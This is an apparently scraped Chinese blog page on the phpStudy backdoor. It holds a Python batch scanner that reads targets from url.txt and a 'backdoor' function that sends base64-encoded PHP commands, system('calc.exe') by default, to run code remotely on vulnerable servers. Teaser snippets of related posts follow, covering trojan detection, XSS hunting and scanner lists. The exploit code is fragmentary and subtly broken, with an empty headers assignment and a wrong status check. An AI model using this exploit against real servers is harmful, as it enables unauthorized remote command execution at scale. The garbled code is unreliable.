phpstudy漏洞檢測

2022-07-18 06:03:10 字數 1591 閱讀 9400

print("[存在漏洞] " + url)

except:

print("[超時] " + url)

if __name__ == '__main__':

print("phpstudy 批量檢測 (需要 gevent,requests 庫)")

print("使用之前,請將url儲存為 url.txt 放置此程式同目錄下")

input("任意按鍵開始執行..")

tasks = [gevent.spawn(check, url) for url in file_read()]

print("正在執行...請等候")

gevent.joinall(tasks)

wait = input("執行完畢 任意鍵退出...")

# !/usr/bin/env python

# -*- coding:utf-8 -*-

import requests

import base64

def backdoor(url, command="system('calc.exe');"):

headers =

command = base64.b64encode(command.encode('utf-8'))

command = str(command, 'utf-8')

result = requests.get(url, headers=headers, verify=false)

if result.status_code == "200":

print("執行完成")

a = input("任意鍵退出...")

url = input("輸入url(例如:")

command = input("輸入命令 預設為 system('calc.exe'); (不想輸入直接回車)\n")

backdoor(url, command)

phpstudy後門檔案檢測及利用

bin bash author pcat chamd5.org trojan feature trojan eval function check dir x dll x then strings f2 grep q trojan if 0 then echo f2 strings f2 grep ...

WEB漏洞檢測與挖掘

xss漏洞挖掘 1 url引數,可以設想該引數是以怎麼樣的形式表現在頁面,然後進行注入 如 a b b的值可以任意,在頁面中可能之間就顯示a,這時候它 的值如果有注入問題就出現了。url引數黑色可以五花八門,所以請注意了,注意好所有是字串型別的引數,這種引數往往容易存在這種url引數的注入問題。2 ...

開源漏洞檢測框架收集

專案簡介 scanners box是乙個集合github平台上的安全行業從業者自研開源掃瞄器的倉庫,包括子網域名稱列舉 資料庫漏洞掃瞄 弱口令或資訊洩漏掃瞄 埠掃瞄 指紋識別以及其他大型掃瞄器或模組化掃瞄器,同時該倉庫只收錄各位自己編寫的一般性開源掃瞄器,類似awvs nmap w3af等知名掃瞄工...